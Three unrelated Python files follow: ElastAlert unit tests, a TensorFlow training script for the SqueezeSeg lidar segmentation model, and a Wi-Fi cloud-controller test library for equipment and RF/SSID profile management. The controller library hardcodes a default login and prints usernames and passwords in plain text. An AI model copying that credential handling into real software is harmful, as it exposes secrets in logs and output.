output, errors = capsys.readouterr()
assert 'Could not reach ElasticSearch at "es:14900".' in errors
# Slept until we passed the deadline.
sleep.mock_calls == [
mock.call(1.0),
mock.call(1.0),
mock.call(1.0),
]
def test_wait_until_responsive_timeout_index_does_not_exist(ea, capsys):
"""Bail out if ElasticSearch doesn't (quickly) become responsive."""
# Never becomes responsive :-)
ea.writeback_es.ping.return_value = True
ea.writeback_es.indices.exists.return_value = False
clock = mock.MagicMock()
clock.side_effect = [0.0, 1.0, 2.0, 3.0]
timeout = datetime.timedelta(seconds=2.5)
with mock.patch('time.sleep') as sleep:
with pytest.raises(SystemExit) as exc:
ea.wait_until_responsive(timeout=timeout, clock=clock)
assert exc.value.code == 1
# Ensure we get useful diagnostics.
output, errors = capsys.readouterr()
assert 'Writeback index "wb" does not exist, did you run `elastalert-create-index`?' in errors
# Slept until we passed the deadline.
sleep.mock_calls == [
mock.call(1.0),
mock.call(1.0),
mock.call(1.0),
]
def test_stop(ea):
""" The purpose of this test is to make sure that calling ElastAlerter.stop() will break it
out of an ElastAlerter.start() loop. This method exists to provide a mechanism for running
ElastAlert with threads and thus must be tested with threads. mock_loop verifies the loop
is running and will call stop after several iterations. """
# Exit the thread on the fourth iteration
def mock_loop():
for i in range(3):
assert ea.running
yield
ea.stop()
with mock.patch.object(ea, 'sleep_for', return_value=None):
with mock.patch.object(ea, 'run_all_rules') as mock_run:
mock_run.side_effect = mock_loop()
start_thread = threading.Thread(target=ea.start)
# Set as daemon to prevent a failed test from blocking exit
start_thread.daemon = True
start_thread.start()
# Give it a few seconds to run the loop
start_thread.join(5)
assert not ea.running
assert not start_thread.is_alive()
assert mock_run.call_count == 4
def test_notify_email(ea):
mock_smtp = mock.Mock()
ea.rules[0]['notify_email'] = ['foo@foo.foo', 'bar@bar.bar']
with mock.patch('elastalert.elastalert.SMTP') as mock_smtp_f:
mock_smtp_f.return_value = mock_smtp
# Notify_email from rules, array
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[0][0][1]) == set(ea.rules[0]['notify_email'])
# With ea.notify_email
ea.notify_email = ['baz@baz.baz']
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[1][0][1]) == set(['baz@baz.baz'] + ea.rules[0]['notify_email'])
# With ea.notify email but as single string
ea.rules[0]['notify_email'] = 'foo@foo.foo'
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[2][0][1]) == set(['baz@baz.baz', 'foo@foo.foo'])
# None from rule
ea.rules[0].pop('notify_email')
ea.send_notification_email('omg', rule=ea.rules[0])
assert set(mock_smtp.sendmail.call_args_list[3][0][1]) == set(['baz@baz.baz'])
def test_uncaught_exceptions(ea):
e = Exception("Errors yo!")
# With disabling set to false
ea.disable_rules_on_error = False
ea.handle_uncaught_exception(e, ea.rules[0])
assert len(ea.rules) == 1
assert len(ea.disabled_rules) == 0
# With disabling set to true
ea.disable_rules_on_error = True
ea.handle_uncaught_exception(e, ea.rules[0])
assert len(ea.rules) == 0
assert len(ea.disabled_rules) == 1
# Changing the file should re-enable it
ea.rule_hashes = {'blah.yaml': 'abc'}
new_hashes = {'blah.yaml': 'def'}
with mock.patch('elastalert.elastalert.get_rule_hashes') as mock_hashes:
with mock.patch('elastalert.elastalert.load_configuration') as mock_load:
mock_load.side_effect = [ea.disabled_rules[0]]
mock_hashes.return_value = new_hashes
ea.load_rule_changes()
assert len(ea.rules) == 1
assert len(ea.disabled_rules) == 0
# Notify email is sent
ea.notify_email = 'qlo@example.com'
with mock.patch.object(ea, 'send_notification_email') as mock_email:
ea.handle_uncaught_exception(e, ea.rules[0])
assert mock_email.call_args_list[0][1] == {'exception': e, 'rule': ea.disabled_rules[0]}
def test_get_top_counts_handles_no_hits_returned(ea):
with mock.patch.object(ea, 'get_hits_terms') as mock_hits:
mock_hits.return_value = None
rule = ea.rules[0]
starttime = datetime.datetime.now() - datetime.timedelta(minutes=10)
endtime = datetime.datetime.now()
keys = ['foo']
all_counts = ea.get_top_counts(rule, starttime, endtime, keys)
assert all_counts == {'top_events_foo': {}}
def test_remove_old_events(ea):
now = ts_now()
minute = datetime.timedelta(minutes=1)
ea.rules[0]['processed_hits'] = {'foo': now - minute,
'bar': now - minute * 5,
'baz': now - minute * 15}
ea.rules[0]['buffer_time'] = datetime.timedelta(minutes=10)
# With a query delay, only events older than 20 minutes will be removed (none)
ea.rules[0]['query_delay'] = datetime.timedelta(minutes=10)
ea.remove_old_events(ea.rules[0])
assert len(ea.rules[0]['processed_hits']) == 3
# With no query delay, the 15 minute old event will be removed
ea.rules[0].pop('query_delay')
ea.remove_old_events(ea.rules[0])
assert len(ea.rules[0]['processed_hits']) == 2
assert 'baz' not in ea.rules[0]['processed_hits']
def test_query_with_whitelist_filter_es(ea):
ea.rules[0]['_source_enabled'] = False
ea.rules[0]['five'] = False
ea.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea.rules[0]['compare_key'] = "username"
ea.rules[0]['whitelist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea.rules[0])
ea.init_rule(new_rule, True)
assert 'NOT username:"xudan1" AND NOT username:"xudan12" AND NOT username:"aa1"' \
in new_rule['filter'][-1]['query']['query_string']['query']
def test_query_with_whitelist_filter_es_five(ea):
ea.es_version = '6.2'
ea.rules[0]['_source_enabled'] = False
ea.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea.rules[0]['compare_key'] = "username"
ea.rules[0]['whitelist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea.rules[0])
ea.init_rule(new_rule, True)
assert 'NOT username:"xudan1" AND NOT username:"xudan12" AND NOT username:"aa1"' in new_rule['filter'][-1]['query_string']['query']
def test_query_with_blacklist_filter_es(ea):
ea.rules[0]['_source_enabled'] = False
ea.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea.rules[0]['compare_key'] = "username"
ea.rules[0]['blacklist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea.rules[0])
ea.init_rule(new_rule, True)
assert 'username:"xudan1" OR username:"xudan12" OR username:"aa1"' in new_rule['filter'][-1]['query']['query_string']['query']
def test_query_with_blacklist_filter_es_five(ea):
ea.es_version = '6.2'
ea.rules[0]['_source_enabled'] = False
ea.rules[0]['filter'] = [{'query_string': {'query': 'baz'}}]
ea.rules[0]['compare_key'] = "username"
ea.rules[0]['blacklist'] = ['xudan1', 'xudan12', 'aa1', 'bb1']
new_rule = copy.copy(ea.rules[0])
ea.init_rule(new_rule, True)
assert 'username:"xudan1" OR username:"xudan12" OR username:"aa1"' in new_rule['filter'][-1]['query_string']['query']
|
train.py
|
# BSD 3-Clause License
#
# Copyright (c) 2019, FPAI
# Copyright (c) 2019, SeriouslyHAO
# Copyright (c) 2019, xcj2019
# Copyright (c) 2019, Leonfirst
#
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Train"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from datetime import datetime
import os.path
import sys
import time
import math
import numpy as np
from six.moves import xrange
import tensorflow as tf
import threading
from config import *
from imdb import kitti
from utils.util import *
from nets import *
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('dataset', 'KITTI',
"""Currently only support KITTI dataset.""")
tf.app.flags.DEFINE_string('data_path', '', """Root directory of data""")
tf.app.flags.DEFINE_string('image_set', 'train',
""" Can be train, trainval, val, or test""")
tf.app.flags.DEFINE_string('train_dir', '/home/dink/DEEPLEARNING/DL_SQUEEZESEG/output',
"""Directory where to write event logs """
"""and checkpoint.""")
tf.app.flags.DEFINE_integer('max_steps', 1000000,
"""Maximum number of batches to run.""")
tf.app.flags.DEFINE_string('net', 'squeezeSeg',
"""Neural net architecture. """)
tf.app.flags.DEFINE_string('pretrained_model_path', '',
"""Path to the pretrained model.""")
tf.app.flags.DEFINE_integer('summary_step', 50,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_integer('checkpoint_step', 1000,
"""Number of steps to save summary.""")
tf.app.flags.DEFINE_string('gpu', '0', """gpu id.""")
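# The flags above fully parameterize a run. A minimal launch sketch (the paths are
# hypothetical placeholders, not part of this repository):
#
#   python train.py --dataset=KITTI \
#                   --data_path=/path/to/kitti \
#                   --image_set=train \
#                   --train_dir=/path/to/output \
#                   --net=squeezeSeg \
#                   --gpu=0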
def train():
"""Train SqueezeSeg model"""
assert FLAGS.dataset == 'KITTI', \
'Currently only support KITTI dataset'
os.environ['CUDA_VISIBLE_DEVICES'] = FLAGS.gpu
with tf.Graph().as_default():
assert FLAGS.net == 'squeezeSeg', \
'Selected neural net architecture not supported: {}'.format(FLAGS.net)
if FLAGS.net == 'squeezeSeg':
mc = kitti_squeezeSeg_config()
mc.PRETRAINED_MODEL_PATH = FLAGS.pretrained_model_path
model = SqueezeSeg(mc)
imdb = kitti(FLAGS.image_set, FLAGS.data_path, mc)
# save model size, flops, activations by layers
with open(os.path.join(FLAGS.train_dir, 'model_metrics.txt'), 'w') as f:
f.write('Number of parameter by layer:\n')
count = 0
for c in model.model_size_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
count = 0
f.write('\nActivation size by layer:\n')
for c in model.activation_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
count = 0
f.write('\nNumber of flops by layer:\n')
for c in model.flop_counter:
f.write('\t{}: {}\n'.format(c[0], c[1]))
count += c[1]
f.write('\ttotal: {}\n'.format(count))
f.close()
print ('Model statistics saved to {}.'.format(
os.path.join(FLAGS.train_dir, 'model_metrics.txt')))
def enqueue(sess, coord):
with coord.stop_on_exception():
while not coord.should_stop():
# read batch input
lidar_per_batch, lidar_mask_per_batch, label_per_batch,\
weight_per_batch = imdb.read_batch()
feed_dict = {
model.ph_keep_prob: mc.KEEP_PROB,
model.ph_lidar_input: lidar_per_batch,
model.ph_lidar_mask: lidar_mask_per_batch,
model.ph_label: label_per_batch,
model.ph_loss_weight: weight_per_batch,
}
sess.run(model.enqueue_op, feed_dict=feed_dict)
saver = tf.train.Saver(tf.all_variables())
summary_op = tf.summary.merge_all()
init = tf.initialize_all_variables()
sess = tf.Session(config=tf.ConfigProto(allow_soft_placement=True))
sess.run(init)
summary_writer = tf.summary.FileWriter(FLAGS.train_dir, sess.graph)
# coord = tf.train.Coordinator()
# enq_threads = []
# for _ in range(mc.NUM_ENQUEUE_THREAD):
# eqth = threading.Thread(target=enqueue, args=[sess, coord])
# eqth.start()
# enq_threads.append(eqth)
#
#
#
run_options = tf.RunOptions(timeout_in_ms=60000)
# try:
if True:
for step in xrange(FLAGS.max_steps):
start_time = time.time()
lidar_per_batch, lidar_mask_per_batch, label_per_batch, \
weight_per_batch = imdb.read_batch()
if step % FLAGS.summary_step == 0 or step == FLAGS.max_steps-1:
print('---------------------------------------------------------------------------')
print('step',step)
# data_lidar_per_batch = tf.constant(data_lidar_per_batch)
# data_lidar_mask_per_batch = tf.constant(data_lidar_mask_per_batch)
# data_label_per_batch = tf.constant(data_label_per_batch)
# data_weight_per_batch = tf.constant(data_weight_per_batch)
# data_lidar_per_batch=tf.cast(data_lidar_per_batch, tf.float32)
# print('data_lidar_per_batch.shape',data_lidar_per_batch.shape)
# print('data_lidar_per_batch.dtype',data_lidar_per_batch.dtype)
# data_lidar_mask_per_batch=tf.cast(data_lidar_mask_per_batch, tf.float32)
# data_label_per_batch=tf.cast(data_label_per_batch, tf.float32)
# data_weight_per_batch=tf.cast(data_weight_per_batch, tf.float32)
# op_list = [
# data_lidar_per_batch, data_lidar_mask_per_batch, data_label_per_batch, model.train_op,
# model.loss, model.pred_cls, summary_op
# ]
# data_lidar_per_batch.shape(32, 64, 512, 5)
# data_lidar_per_batch.dtype < dtype: 'float32' >
# model.lidar_input(32, 64, 512, 5)
# model.lidar_input.dtype < dtype: 'float32' >
op_list = [
model.lidar_input, model.lidar_mask, model.label, model.train_op,
model.loss, model.pred_cls, summary_op
]
# print('model.lidar_input',model.lidar_input.shape)
# print('model.lidar_input.dtype',model.lidar_input.dtype)
# lidar_per_batch, lidar_mask_per_batch, label_per_batch, _ \
# = imdb.read_batch(shuffle=False)
# pred_cls = sess.run(
# model.pred_cls,
# feed_dict={
# model.lidar_input: lidar_per_batch,
# model.keep_prob: 1.0,
# model.lidar_mask: lidar_mask_per_batch
# }
# )
lidar_per_batch, lidar_mask_per_batch, label_per_batch, \
_, loss_value, pred_cls, summary_str = sess.run(op_list,
feed_dict={
model.keep_prob: 0.5,
model.lidar_input: lidar_per_batch,
model.lidar_mask: lidar_mask_per_batch,
model.label: label_per_batch,
model.loss_weight: weight_per_batch
})
# options=run_options)
label_image = visualize_seg(label_per_batch[:6, :, :], mc)
pred_image = visualize_seg(pred_cls[:6, :, :], mc)
# Run evaluation on the batch
ious, _, _, _ = evaluate_iou(
label_per_batch, pred_cls*np.squeeze(lidar_mask_per_batch),
mc.NUM_CLASS)
feed_dict = {}
# Assume that class-0 is the background class
for i in range(1, mc.NUM_CLASS):
feed_dict[model.iou_summary_placeholders[i]] = ious[i]
iou_summary_list = sess.run(model.iou_summary_ops[1:], feed_dict)
# Run visualization
viz_op_list = [model.show_label, model.show_depth_img, model.show_pred]
viz_summary_list = sess.run(
viz_op_list,
feed_dict={
model.depth_image_to_show: lidar_per_batch[:6, :, :, [4]],
model.label_to_show: label_image,
model.pred_image_to_show: pred_image,
}
)
# Add summaries
summary_writer.add_summary(summary_str, step)
for sum_str in iou_summary_list:
summary_writer.add_summary(sum_str, step)
for viz_sum in viz_summary_list:
summary_writer.add_summary(viz_sum, step)
# force tensorflow to synchronise summaries
summary_writer.flush()
else:
_, loss_value = sess.run(
[model.train_op, model.loss],feed_dict={
model.keep_prob: 0.5,
model.lidar_input: lidar_per_batch,
model.lidar_mask: lidar_mask_per_batch,
model.label: label_per_batch,
model.loss_weight: weight_per_batch
})
duration = time.time() - start_time
assert not np.isnan(loss_value), \
'Model diverged. Total loss: {}'.format(loss_value)
if step % 10 == 0:
num_images_per_step = mc.BATCH_SIZE
images_per_sec = num_images_per_step / duration
sec_per_batch = float(duration)
format_str = ('%s: step %d, loss = %.2f (%.1f images/sec; %.3f '
'sec/batch)')
print (format_str % (datetime.now(), step, loss_value,
images_per_sec, sec_per_batch))
sys.stdout.flush()
# Save the model checkpoint periodically.
if step % FLAGS.checkpoint_step == 0 or step == FLAGS.max_steps-1:
checkpoint_path = os.path.join(FLAGS.train_dir, 'model.ckpt')
saver.save(sess, checkpoint_path, global_step=step)
# except Exception, e:
# print('e',e)
# sys.exit()
# coord.request_stop(e)
# finally:
# coord.request_stop()
# sess.run(model.q.close(cancel_pending_enqueues=True))
# coord.join(enq_threads)
def main(argv=None): # pylint: disable=unused-argument
if tf.gfile.Exists(FLAGS.train_dir):
tf.gfile.DeleteRecursively(FLAGS.train_dir)
tf.gfile.MakeDirs(FLAGS.train_dir)
train()
if __name__ == '__main__':
tf.app.run()
|
controller.py
|
# !/usr/local/lib64/python3.8
"""
Controller Library
1. controller_data/sdk_base_url
2. login credentials
"""
import base64
import datetime
import json
import re
import ssl
import time
import urllib
import requests
import swagger_client
from swagger_client import FirmwareManagementApi
from swagger_client import EquipmentGatewayApi
from bs4 import BeautifulSoup
import threading
class ConfigureController:
def __init__(self):
self.configuration = swagger_client.Configuration()
def set_credentials(self, controller_data=None):
if controller_data is not None and "username" in controller_data and "password" in controller_data:
self.configuration.username = controller_data["username"]
self.configuration.password = controller_data["password"]
print("Login Credentials set to custom: \n user_id: %s\n password: %s\n" % (controller_data["username"],
controller_data["password"]))
return True
else:
self.configuration.username = "support@example.com"
self.configuration.password = "support"
print("Login Credentials set to default: \n user_id: %s\n password: %s\n" % ("support@example.com",
"support"))
return False
def select_controller_data(self, controller_data=None):
if controller_data is None or "url" not in controller_data:
print("No controller_data Selected")
exit()
self.sdk_base_url = controller_data["url"]
self.configuration.host = self.sdk_base_url
print("controller_data Selected: %s\n SDK_BASE_URL: %s\n" % (controller_data["url"], self.sdk_base_url))
return True
def set_sdk_base_url(self, sdk_base_url=None):
if sdk_base_url is None:
print("URL is None")
exit()
self.configuration.host = sdk_base_url
return True
"""
Library for generic cloud_controller_tests usage; it instantiates the bearer token and credentials
and provides connectivity to the cloud.
Instantiate the object by providing controller_data=controller_url, customer_id=2
(see the commented usage sketch below).
"""
class Controller(ConfigureController):
"""
constructor for cloud_controller_tests library
"""
def __init__(self, controller_data=None, customer_id=None):
super().__init__()
self.controller_data = controller_data
self.customer_id = customer_id
if customer_id is None:
self.customer_id = 2
print("Setting to default Customer ID 2")
#
# Setting the Controller Client Configuration
self.select_controller_data(controller_data=controller_data)
self.set_credentials(controller_data=controller_data)
self.configuration.refresh_api_key_hook = self.get_bearer_token
# Connecting to Controller
self.api_client = swagger_client.ApiClient(self.configuration)
self.login_client = swagger_client.LoginApi(api_client=self.api_client)
self.bearer = False
self.disconnect = False
# Token expiry in seconds
self.token_expiry = 1000
self.token_timestamp = time.time()
try:
self.bearer = self.get_bearer_token()
# t1 = threading.Thread(target=self.refresh_instance)
# t1.start()
self.api_client.default_headers['Authorization'] = "Bearer " + self.bearer._access_token
self.status_client = swagger_client.StatusApi(api_client=self.api_client)
self.equipment_client = swagger_client.EquipmentApi(self.api_client)
self.profile_client = swagger_client.ProfileApi(self.api_client)
self.api_client.configuration.api_key_prefix = {
"Authorization": "Bearer " + self.bearer._access_token
}
self.api_client.configuration.refresh_api_key_hook = self.refresh_instance
self.ping_response = self.portal_ping()
print("Portal details :: \n", self.ping_response)
except Exception as e:
self.bearer = False
print(e)
print("Connected to Controller Server")
def get_bearer_token(self):
request_body = {
"userId": self.configuration.username,
"password": self.configuration.password
}
return self.login_client.get_access_token(request_body)
def refresh_instance(self):
# Refresh token 10 seconds before it's expiry
if time.time() - self.token_timestamp > self.token_expiry - 10:
self.token_timestamp = time.time()
print("Refreshing the controller API token")
self.disconnect_Controller()
self.api_client = swagger_client.ApiClient(self.configuration)
self.login_client = swagger_client.LoginApi(api_client=self.api_client)
self.bearer = self.get_bearer_token()
self.api_client.default_headers['Authorization'] = "Bearer " + self.bearer._access_token
self.status_client = swagger_client.StatusApi(api_client=self.api_client)
self.equipment_client = swagger_client.EquipmentApi(self.api_client)
self.profile_client = swagger_client.ProfileApi(self.api_client)
self.api_client.configuration.api_key_prefix = {
"Authorization": "Bearer " + self.bearer._access_token
}
self.api_client.configuration.refresh_api_key_hook = self.refresh_instance
self.ping_response = self.portal_ping()
print("Portal details :: \n", self.ping_response)
if self.ping_response._application_name != 'PortalServer':
print("Server not Reachable")
exit()
print("Connected to Controller Server")
def portal_ping(self):
self.refresh_instance()
return self.login_client.portal_ping()
def disconnect_Controller(self):
self.refresh_instance()
self.disconnect = True
self.api_client.__del__()
# Returns a list of all the equipments available in the cloud instance
def get_equipment_by_customer_id(self, max_items=10):
self.refresh_instance()
pagination_context = """{
"model_type": "PaginationContext",
"maxItemsPerPage": """ + str(max_items) + """
}"""
self.refresh_instance()
equipment_data = self.equipment_client.get_equipment_by_customer_id(customer_id=self.customer_id,
pagination_context=pagination_context)
return equipment_data._items
# Check whether an equipment with the given equipment_id is available in the cloud instance
def validate_equipment_availability(self, equipment_id=None):
self.refresh_instance()
data = self.get_equipment_by_customer_id()
for i in data:
if i._id == equipment_id:
return i._id
return -1
# Needs to be added in the future
def request_ap_reboot(self):
self.refresh_instance()
pass
# Get the equipment id of an equipment with the given serial number
def get_equipment_id(self, serial_number=None):
self.refresh_instance()
equipment_data = self.get_equipment_by_customer_id(max_items=100)
# print(len(equipment_data))
for equipment in equipment_data:
if equipment._serial == serial_number:
return equipment._id
# Get the equipment model name of a given equipment_id
def get_model_name(self, equipment_id=None):
self.refresh_instance()
if equipment_id is None:
return None
self.refresh_instance()
data = self.equipment_client.get_equipment_by_id(equipment_id=equipment_id)
print(str(data._details._equipment_model))
return str(data._details._equipment_model)
# Needs Bug fix from swagger code generation side
def get_ap_firmware_new_method(self, equipment_id=None):
self.refresh_instance()
response = self.status_client.get_status_by_customer_equipment(customer_id=self.customer_id,
equipment_id=equipment_id)
print(response[2])
# Old method, will be deprecated in the future
def get_ap_firmware_old_method(self, equipment_id=None):
self.refresh_instance()
url = self.configuration.host + "/portal/status/forEquipment?customerId=" + str(
self.customer_id) + "&equipmentId=" + str(equipment_id)
payload = {}
headers = self.configuration.api_key_prefix
response = requests.request("GET", url, headers=headers, data=payload)
if response.status_code == 200:
status_data = response.json()
# print(status_data)
try:
current_ap_fw = status_data[2]['details']['reportedSwVersion']
# print(current_ap_fw)
return current_ap_fw
except Exception as e:
print(e)
current_ap_fw = "error"
return e
else:
return False
"""
Profile Utilities
"""
def get_current_profile_on_equipment(self, equipment_id=None):
self.refresh_instance()
default_equipment_data = self.equipment_client.get_equipment_by_id(equipment_id=equipment_id, async_req=False)
return default_equipment_data._profile_id
# Get the ssid's that are used by the equipment
def get_ssids_on_equipment(self, equipment_id=None):
self.refresh_instance()
profile_id = self.get_current_profile_on_equipment(equipment_id=equipment_id)
all_profiles = self.profile_client.get_profile_with_children(profile_id=profile_id)
ssid_name_list = []
for i in all_profiles:
if i._profile_type == "ssid":
ssid_name_list.append(i._details['ssid'])
return ssid_name_list
# Get the child ssid profiles that are used by equipment ap profile of given profile id
def get_ssid_profiles_from_equipment_profile(self, profile_id=None):
self.refresh_instance()
equipment_ap_profile = self.profile_client.get_profile_by_id(profile_id=profile_id)
ssid_name_list = []
child_profile_ids = equipment_ap_profile.child_profile_ids
for i in child_profile_ids:
profile = self.profile_client.get_profile_by_id(profile_id=i)
if profile._profile_type == "ssid":
ssid_name_list.append(profile._details['ssid'])
return ssid_name_list
"""
Library for profile utilities: creating, pushing, and deleting profiles.
Steps to create a profile on the controller:
create an RF profile
create a Radius profile
create SSID profiles, and attach the Radius profile to them if needed (only used by EAP SSIDs)
create an equipment_ap profile, and attach the RF profile and SSID profiles to it
Finally, the push profile method pushes the equipment_ap profile to the AP with the given equipment_id
(see the commented usage sketch below).
"""
class ProfileUtility:
"""
constructor for Access Point Utility library
"""
def __init__(self, sdk_client=None, controller_data=None, customer_id=None):
if sdk_client is None:
sdk_client = Controller(controller_data=controller_data, customer_id=customer_id)
self.sdk_client = sdk_client
self.sdk_client.refresh_instance()
self.profile_client = swagger_client.ProfileApi(api_client=self.sdk_client.api_client)
self.profile_creation_ids = {
"ssid": [],
"ap": [],
"radius": [],
"rf": [],
"passpoint_osu_id_provider": [],
"passpoint_operator": [],
"passpoint_venue": [],
"passpoint": []
}
self.profile_name_with_id = {}
self.default_profiles = {}
self.profile_ids = []
def cleanup_objects(self):
self.sdk_client.refresh_instance()
self.profile_creation_ids = {
"ssid": [],
"ap": [],
"radius": [],
"rf": [],
"passpoint_osu_id_provider": [],
"passpoint_operator": [],
"passpoint_venue": [],
"passpoint": []
}
self.profile_name_with_id = {}
self.default_profiles = {}
self.profile_ids = []
def get_profile_by_name(self, profile_name=None):
self.sdk_client.refresh_instance()
pagination_context = """{
"model_type": "PaginationContext",
"maxItemsPerPage": 1000
}"""
profiles = self.profile_client.get_profiles_by_customer_id(customer_id=self.sdk_client.customer_id,
pagination_context=pagination_context)
for i in profiles._items:
if i._name == profile_name:
return i
return None
def get_ssid_name_by_profile_id(self, profile_id=None):
self.sdk_client.refresh_instance()
profiles = self.profile_client.get_profile_by_id(profile_id=profile_id)
return profiles._details["ssid"]
"""
default templates are as follows (see the commented example below):
profile_name= TipWlan-rf/
Radius-Profile/
TipWlan-2-Radios/
TipWlan-3-Radios/
TipWlan-Cloud-Wifi/
Captive-Portal
"""
def get_default_profiles(self):
pagination_context = """{
"model_type": "PaginationContext",
"maxItemsPerPage": 100
}"""
self.sdk_client.refresh_instance()
items = self.profile_client.get_profiles_by_customer_id(customer_id=self.sdk_client.customer_id,
pagination_context=pagination_context)
for i in items._items:
# print(i._name, i._id)
if i._name == "TipWlan-Cloud-Wifi":
self.default_profiles['ssid'] = i
if i._name == "TipWlan-3-Radios":
self.default_profiles['equipment_ap_3_radios'] = i
if i._name == "TipWlan-2-Radios":
self.default_profiles['equipment_ap_2_radios'] = i
if i._name == "Captive-Portal":
self.default_profiles['captive_portal'] = i
if i._name == "Radius-Profile":
self.default_profiles['radius'] = i
if i._name == "TipWlan-rf":
self.default_profiles['rf'] = i
# print(i)
# This will delete the profiles associated with an equipment of the given equipment_id, and associate it to the default
# equipment_ap profile
def delete_current_profile(self, equipment_id=None):
self.sdk_client.refresh_instance()
equipment_data = self.sdk_client.equipment_client.get_equipment_by_id(equipment_id=equipment_id)
data = self.profile_client.get_profile_with_children(profile_id=equipment_data._profile_id)
delete_ids = []
for i in data:
if i._name == "TipWlan-rf":
continue
else:
delete_ids.append(i._id)
# print(delete_ids)
self.get_default_profiles()
self.profile_creation_ids['ap'] = self.default_profiles['equipment_ap_3_radios']._id
# print(self.profile_creation_ids)
self.push_profile_old_method(equipment_id=equipment_id)
self.delete_profile(profile_id=delete_ids)
# This will delete all the profiles on a controller instance, except the default profiles
def cleanup_profiles(self):
self.sdk_client.refresh_instance()
try:
self.get_default_profiles()
pagination_context = """{
"model_type": "PaginationContext",
"maxItemsPerPage": 10000
}"""
skip_delete_id = []
for i in self.default_profiles:
skip_delete_id.append(self.default_profiles[i]._id)
all_profiles = self.profile_client.get_profiles_by_customer_id(customer_id=self.sdk_client.customer_id,
pagination_context=pagination_context)
delete_ids = []
for i in all_profiles._items:
delete_ids.append(i._id)
delete_ids = list(set(delete_ids) - set(delete_ids).intersection(set(skip_delete_id)))
print(delete_ids)
for i in delete_ids:
self.set_equipment_to_profile(profile_id=i)
self.delete_profile(profile_id=delete_ids)
status = True
except Exception as e:
print(e)
status = False
return status
# Delete any profile with the given name
def delete_profile_by_name(self, profile_name=None):
self.sdk_client.refresh_instance()
pagination_context = """{
"model_type": "PaginationContext",
"maxItemsPerPage": 5000
}"""
all_profiles = self.profile_client.get_profiles_by_customer_id(customer_id=self.sdk_client.customer_id,
pagination_context=pagination_context)
for i in all_profiles._items:
if i._name == profile_name:
counts = self.profile_client.get_counts_of_equipment_that_use_profiles([i._id])[0]
if counts._value2:
self.set_equipment_to_profile(profile_id=i._id)
self.delete_profile(profile_id=[i._id])
else:
self.delete_profile(profile_id=[i._id])
# Set every equipment that currently uses the given profile_id back to the default equipment_ap profile
def set_equipment_to_profile(self, profile_id=None):
self.sdk_client.refresh_instance()
pagination_context = """{
"model_type": "PaginationContext",
"maxItemsPerPage": 5000
}"""
equipment_data = self.sdk_client.equipment_client. \
get_equipment_by_customer_id(customer_id=2,
pagination_context=pagination_context)
self.get_default_profiles()
for i in equipment_data._items:
if i._profile_id == profile_id:
self.profile_creation_ids['ap'] = self.default_profiles['equipment_ap_2_radios']._id
self.push_profile_old_method(equipment_id=i._id)
time.sleep(2)
"""
Method call: used to create an RF profile, set its parameters accordingly, and update it.
Library method to create a new RF profile; it now starts from the default RF profile
(see the commented example below).
"""
def set_rf_profile(self, profile_data=None, mode=None):
self.sdk_client.refresh_instance()
self.get_default_profiles()
if mode == "wifi5":
default_profile = self.default_profiles['rf']
default_profile._name = profile_data["name"]
default_profile._details["rfConfigMap"]["is2dot4GHz"]["rf"] = profile_data["name"]
default_profile._details["rfConfigMap"]["is5GHz"]["rf"] = profile_data["name"]
default_profile._details["rfConfigMap"]["is5GHzL"]["rf"] = profile_data["name"]
default_profile._details["rfConfigMap"]["is5GHzU"]["rf"] = profile_data["name"]
for i in default_profile._details["rfConfigMap"]:
for j in profile_data:
if i == j:
for k in default_profile._details["rfConfigMap"][i]:
for l in profile_data[j]:
if l == k:
default_profile._details["rfConfigMap"][i][l] = profile_data[j][l]
profile = self.profile_client.create_profile(body=default_profile)
self.profile_creation_ids['rf'].append(profile._id)
return profile
if mode == "wifi6":
default_profile = self.default_profiles['rf']
default_profile._name = profile_data["name"]
default_profile._details["rfConfigMap"]["is2dot4GHz"]["activeScanSettings"]["enabled"] = False
default_profile._details["rfConfigMap"]["is2dot4GHz"]["radioMode"] = 'modeAX'
default_profile._details["rfConfigMap"]["is5GHz"]["radioMode"] = 'modeAX'
